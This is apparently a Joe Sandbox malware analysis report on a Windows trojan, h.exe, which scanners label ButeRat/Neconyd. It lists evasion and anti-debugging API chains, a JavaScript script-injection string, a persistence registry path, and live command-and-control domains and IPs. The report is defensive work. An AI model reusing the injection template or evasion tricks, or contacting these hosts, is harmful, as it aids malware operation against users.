        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,0_2_0040350F
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,0_2_004039EA
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,13_2_0040350F
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,13_2_004039EA
        Source: C:\Users\user\Desktop\h.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-5799
        Source: C:\Users\user\Desktop\h.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-5799
        Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_13-5734
        Source: C:\Users\user\Desktop\h.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-5784
        Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_13-5861
        Source: C:\Users\user\Desktop\h.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-5861
        Source: C:\Users\user\Desktop\h.exeAPI coverage: 8.6 %
        Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 4052Thread sleep time: -40000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\omsecor.exe TID: 7744Thread sleep time: -40000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040ABD9 FindFirstFileW,FindClose,0_2_0040ABD9
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00408248
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040ABD9 FindFirstFileW,FindClose,13_2_0040ABD9
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,13_2_00408248
        Source: omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp5a%SystemRoot%\system32\mswsock.dllE
        Source: omsecor.exe, 00000002.00000002.1665837738.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000085A000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000003.1646596868.000000000085A000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*
        Source: C:\Users\user\Desktop\h.exeAPI call chain: ExitProcess graph end nodegraph_0-5889
        Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_13-5889

        Anti Debugging

        barindex
        Source: C:\Windows\SysWOW64\omsecor.exeDebugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleepgraph_13-6402
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CD66
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_004075D4 GetLastError,CreateFileW,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,RtlAllocateHeap,ReadFile,ReadFile,WriteFile,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,WriteFile,CloseHandle,FindCloseChangeNotification,CloseHandle,0_2_004075D4
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CD66
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_004032B8
        Source: C:\Windows\SysWOW64\omsecor.exeCode function: 13_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040CD66
        Source: h.exe, omsecor.exeBinary or memory string: Shell_TrayWnd
        Source: h.exe, omsecor.exe.0.dr, omsecor.exe.2.drBinary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_time*CsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: */*
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_0040CB03 cpuid 0_2_0040CB03
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_00407267 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv,0_2_00407267
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00407499
        Source: C:\Users\user\Desktop\h.exeCode function: 0_2_00406CB5 GetVersionExW,0_2_00406CB5
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
        Valid Accounts2
        Command and Scripting Interpreter
        Path Interception2
        Process Injection
        121
        Masquerading
        OS Credential Dumping2
        System Time Discovery
        Remote Services1
        Archive Collected Data
        Exfiltration Over Other Network Medium1
        Encrypted Channel
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
        Default Accounts21
        Native API
        Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
        Virtualization/Sandbox Evasion
        LSASS Memory221
        Security Software Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
        Ingress Tool Transfer
        SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
        Domain AccountsAtLogon Script (Windows)Logon Script (Windows)2
        Process Injection
        Security Account Manager11
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
        Non-Application Layer Protocol
        Data Encrypted for ImpactDNS ServerEmail Addresses
        Local AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information
        NTDS1
        Process Discovery
        Distributed Component Object ModelInput CaptureTraffic Duplication12
        Application Layer Protocol
        Data DestructionVirtual Private ServerEmployee Names
        Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
        Obfuscated Files or Information
        LSA Secrets1
        File and Directory Discovery
        SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
        Replication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials13
        System Information Discovery
        VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        h.exe100%ReversingLabsWin32.Trojan.ButeRat
        h.exe89%VirustotalBrowse
        h.exe100%AviraTR/Crypt.XPACK.Gen
        h.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\omsecor.exe100%AviraTR/Crypt.XPACK.Gen
        C:\Windows\SysWOW64\omsecor.exe100%AviraTR/Crypt.XPACK.Gen
        C:\Users\user\AppData\Roaming\omsecor.exe100%Joe Sandbox ML
        C:\Windows\SysWOW64\omsecor.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\omsecor.exe100%ReversingLabsWin32.Trojan.ButeRat
        C:\Windows\SysWOW64\omsecor.exe100%ReversingLabsWin32.Trojan.ButeRat
        No Antivirus matches
        SourceDetectionScannerLabelLink
        lousta.net12%VirustotalBrowse
        mkkuei4kdsz.com12%VirustotalBrowse
        ow5dirasuek.com9%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://lousta.net/F.100%Avira URL Cloudmalware
        http://ow5dirasuek.com/92/650.htmlx;100%Avira URL Cloudmalware
        http://lousta.net/242/343.html100%Avira URL Cloudmalware
        http://lousta.net/763/735.htmlr-b100%Avira URL Cloudmalware
        http://mkkuei4kdsz.com/100%Avira URL Cloudmalware
        https://nojs.domaincntrol.com0%Avira URL Cloudsafe
        https://nojs.domaincntrol.com0%VirustotalBrowse
        http://mkkuei4kdsz.com/12%VirustotalBrowse
        http://ow5dirasuek.com/92/650.html100%Avira URL Cloudmalware
        http://ow5dirasuek.com/S100%Avira URL Cloudmalware
        http://ow5dirasuek.com/T100%Avira URL Cloudmalware
        http://lousta.net/650/534.html100%Avira URL Cloudmalware
        http://lousta.net/100%Avira URL Cloudmalware
        http://ow5dirasuek.com/S9%VirustotalBrowse
        http://ow5dirasuek.com/580/608.htmlE100%Avira URL Cloudmalware
        http://mkkuei4kdsz.com/569/916.html9100%Avira URL Cloudmalware
        http://mkkuei4kdsz.com/1EF8FD00309293F2C34F3L100%Avira URL Cloudmalware
        http://lousta.net/12%VirustotalBrowse
        http://ow5dirasuek.com/T7%VirustotalBrowse
        http://lousta.net/650/534.html8%VirustotalBrowse
        http://lousta.net/763/735.html$100%Avira URL Cloudmalware
        http://lousta.net/7/91.html100%Avira URL Cloudmalware
        http://ow5dirasuek.com/92/650.html10%VirustotalBrowse
        http://ow5dirasuek.com/580/608.html100%Avira URL Cloudmalware
        http://lousta.net/876/244.html100%Avira URL Cloudmalware
        http://ow5dirasuek.com/580/608.html7100%Avira URL Cloudmalware
        http://ow5dirasuek.com/lousta.net100%Avira URL Cloudmalware
        https://domaincntrol.com/?orighost=0%Avira URL Cloudsafe
        http://ow5dirasuek.com/580/608.html9%VirustotalBrowse
        http://lousta.net/763/735.html100%Avira URL Cloudmalware
        http://mkkuei4kdsz.com/569/916.html100%Avira URL Cloudmalware
        http://ow5dirasuek.com/lousta.net8%VirustotalBrowse
        http://lousta.net/876/244.html15%VirustotalBrowse
        http://ow5dirasuek.com/92/650.htmlws100%Avira URL Cloudmalware
        http://lousta.net/7/91.htmla100%Avira URL Cloudmalware
        http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon100%Avira URL Cloudmalware
        http://lousta.net/763/735.htmlZ100%Avira URL Cloudmalware
        http://mkkuei4kdsz.com/569/916.html2%VirustotalBrowse
        http://lousta.net/650/534.htmlr100%Avira URL Cloudmalware
        https://domaincntrol.com/?orighost=0%VirustotalBrowse
        http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon7%VirustotalBrowse
        http://ow5dirasuek.com/580/608.htmlg100%Avira URL Cloudmalware
        http://ow5dirasuek.com/100%Avira URL Cloudmalware
        http://lousta.net/0100%Avira URL Cloudmalware
        http://lousta.net/763/735.html9%VirustotalBrowse
        http://mkkuei4kdsz.com/470/855.html100%Avira URL Cloudmalware
        http://lousta.net/763/735.htmlhtml100%Avira URL Cloudmalware
        http://mkkuei4kdsz.com/470/855.html-8a8d424fbe43573ef1HiLMEM100%Avira URL Cloudmalware
        http://lousta.net/763/735.html_-O100%Avira URL Cloudmalware
        http://lousta.net/014%VirustotalBrowse
        http://mkkuei4kdsz.com/470/855.html13%VirustotalBrowse
        http://ow5dirasuek.com/92/650.htmll;100%Avira URL Cloudmalware
        http://ow5dirasuek.com/580/608.htmlm100%Avira URL Cloudmalware
        http://ow5dirasuek.com/580/608.htmlk100%Avira URL Cloudmalware
        http://lousta.net/763/735.htmlH100%Avira URL Cloudmalware
        http://mkkuei4kdsz.com/569/916.html#100%Avira URL Cloudmalware
        http://ow5dirasuek.com/9%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        lousta.net
        193.166.255.171
        truetrueunknown
        mkkuei4kdsz.com
        64.225.91.73
        truetrueunknown
        ow5dirasuek.com
        34.41.229.245
        truetrueunknown
        NameMaliciousAntivirus DetectionReputation
        http://mkkuei4kdsz.com/true
        • 12%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/92/650.htmltrue
        • 10%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/650/534.htmltrue
        • 8%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/true
        • 12%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/580/608.htmltrue
        • 9%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://mkkuei4kdsz.com/569/916.htmltrue
        • 2%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/true
        • 9%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://mkkuei4kdsz.com/470/855.htmltrue
        • 13%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://lousta.net/F.omsecor.exe, 00000002.00000003.1646596868.000000000083E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        https://nojs.domaincntrol.comomsecor.exe, 00000002.00000002.1665581772.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://lousta.net/242/343.htmlomsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/92/650.htmlx;omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/763/735.htmlr-bomsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/Somsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • 9%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/Tomsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • 7%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/580/608.htmlEomsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://mkkuei4kdsz.com/569/916.html9omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://mkkuei4kdsz.com/1EF8FD00309293F2C34F3Lomsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/763/735.html$omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/7/91.htmlomsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/876/244.htmlomsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • 15%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/580/608.html7omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/lousta.netomsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
        • 8%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        https://domaincntrol.com/?orighost=omsecor.exe, 00000002.00000002.1665581772.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://lousta.net/763/735.htmlomsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • 9%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/92/650.htmlwsomsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/7/91.htmlaomsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconh.exe, omsecor.exe.0.dr, omsecor.exe.2.drfalse
        • 7%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/763/735.htmlZomsecor.exe, 0000000D.00000002.2466068353.00000000005AE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/650/534.htmlromsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/580/608.htmlgomsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/0omsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmpfalse
        • 14%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/763/735.htmlhtmlomsecor.exe, 0000000D.00000002.2465507497.0000000000194000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://mkkuei4kdsz.com/470/855.html-8a8d424fbe43573ef1HiLMEMomsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/763/735.html_-Oomsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/92/650.htmll;omsecor.exe, 00000002.00000002.1665837738.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/580/608.htmlmomsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ow5dirasuek.com/580/608.htmlkomsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://lousta.net/763/735.htmlHomsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://mkkuei4kdsz.com/569/916.html#omsecor.exe, 0000000D.00000002.2466068353.000000000060C000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000D.00000002.2466068353.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        64.225.91.73
        mkkuei4kdsz.comUnited States
        14061DIGITALOCEAN-ASNUStrue
        193.166.255.171
        lousta.netFinland
        1741FUNETASFItrue
        34.41.229.245
        ow5dirasuek.comUnited States
        2686ATGS-MMD-ASUStrue
        Joe Sandbox version:38.0.0 Ammolite
        Analysis ID:1379486
        Start date and time:2024-01-23 13:37:44 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 44s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:18
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:h.exe
        Detection:MAL
        Classification:mal100.bank.troj.evad.winEXE@5/2@3/3
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 22
        • Number of non-executed functions: 116
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        13:38:34API Interceptor8x Sleep call for process: omsecor.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        64.225.91.73bt.exeGet hashmaliciousNeconydBrowse
        • mkkuei4kdsz.com/514/484.html
        http://cloud-kingl.comGet hashmaliciousUnknownBrowse
        • cloud-kingl.com/favicon.ico
        http://cloud-kingl.comGet hashmaliciousUnknownBrowse
        • cloud-kingl.com/favicon.ico
        ewiuer2.exeGet hashmaliciousNeconydBrowse
        • mkkuei4kdsz.com/543/303.html
        ewiuer2.exeGet hashmaliciousNeconydBrowse
        • mkkuei4kdsz.com/180/41.html
        spug64.exeGet hashmaliciousSimda StealerBrowse
        • qetyhyg.com/login.php
        ewiuer2.exeGet hashmaliciousNeconydBrowse
        • mkkuei4kdsz.com/920/418.html
        omsecor.exeGet hashmaliciousNeconydBrowse
        • mkkuei4kdsz.com/578/310.html
        vrz9hacoe.exeGet hashmaliciousNeconydBrowse
        • mkkuei4kdsz.com/293/112.html
        992ODFADS.exeGet hashmaliciousNeconydBrowse
        • mkkuei4kdsz.com/897/430.html
        193.166.255.171SecuriteInfo.com.W32.A-7d961ee5.Eldorado.7374.8622.dllGet hashmaliciousUnknownBrowse
        • imp.install-zone.com/impression.do/?user_id=A6C92C74-32A2-4D2D-9566-E58C15B28C62&event=setup_cancelled_dll_unitialized&spsource=&browser=CR&implementation_id=dll
        2oivDTuQtl.exeGet hashmaliciousUnknownBrowse
        • lousta.net/994/81.html
        eQcKjYOV30.exeGet hashmaliciousPushdoBrowse
        • www.synetik.net/
        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
        • www.synetik.net/
        VuDUlvfL3Q.exeGet hashmaliciousUnknownBrowse
        • tra03.t3ded.com:8080/ra03/d.txt
        file.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
        • www.synetik.net/
        file.exeGet hashmaliciousPushdo, SmokeLoaderBrowse
        • www.synetik.net/
        GhjIqAjQKg.exeGet hashmaliciousUnknownBrowse
        • tsa13.t12hg.com:8080/sa13/d.txt
        0fmEh2zmDj.exeGet hashmaliciousPushdoBrowse
        • www.synetik.net/
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ow5dirasuek.combt.exeGet hashmaliciousNeconydBrowse
        • 34.41.229.245
        ewiuer2.exeGet hashmaliciousNeconydBrowse
        • 34.41.229.245
        ewiuer2.exeGet hashmaliciousNeconydBrowse
        • 34.41.229.245
        ewiuer2.exeGet hashmaliciousNeconydBrowse
        • 34.41.229.245
        omsecor.exeGet hashmaliciousNeconydBrowse
        • 34.41.229.245
        vrz9hacoe.exeGet hashmaliciousNeconydBrowse
        • 34.41.229.245
        992ODFADS.exeGet hashmaliciousNeconydBrowse
        • 34.41.229.245
        AJKXCXCD.exeGet hashmaliciousNeconydBrowse
        • 34.41.229.245
        FJDCSAXE.exeGet hashmaliciousNeconydBrowse
        • 34.41.229.245
        ASCNXSAX.exeGet hashmaliciousNeconydBrowse
        • 34.41.229.245
        lousta.netomsecor.exeGet hashmaliciousNeconydBrowse
        • 193.166.255.171
        FJDCSAXE.exeGet hashmaliciousNeconydBrowse
        • 193.166.255.171
        ABNCCDC.exeGet hashmaliciousNeconydBrowse
        • 193.166.255.171
        tW5EoSZxTD.exeGet hashmaliciousUnknownBrowse
        • 193.166.255.171
        2oivDTuQtl.exeGet hashmaliciousUnknownBrowse
        • 193.166.255.171
        E4000800.exeGet hashmaliciousUnknownBrowse
        • 193.166.255.171
        e621.exeGet hashmaliciousUnknownBrowse
        • 193.166.255.171
        mkkuei4kdsz.combt.exeGet hashmaliciousNeconydBrowse
        • 64.225.91.73
        ewiuer2.exeGet hashmaliciousNeconydBrowse
        • 64.225.91.73
        ewiuer2.exeGet hashmaliciousNeconydBrowse
        • 64.225.91.73
        ewiuer2.exeGet hashmaliciousNeconydBrowse
        • 64.225.91.73
        omsecor.exeGet hashmaliciousNeconydBrowse
        • 64.225.91.73
        vrz9hacoe.exeGet hashmaliciousNeconydBrowse
        • 64.225.91.73
        992ODFADS.exeGet hashmaliciousNeconydBrowse
        • 64.225.91.73
        AJKXCXCD.exeGet hashmaliciousNeconydBrowse
        • 64.225.91.73
        FJDCSAXE.exeGet hashmaliciousNeconydBrowse
        • 64.225.91.73
        ASCNXSAX.exeGet hashmaliciousNeconydBrowse
        • 64.225.91.73
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        FUNETASFIx86.elfGet hashmaliciousMiraiBrowse
        • 157.24.172.22
        ZgNq4f7FBn.elfGet hashmaliciousMiraiBrowse
        • 157.24.20.223
        huhu.arm5.elfGet hashmaliciousMiraiBrowse
        • 130.234.53.110
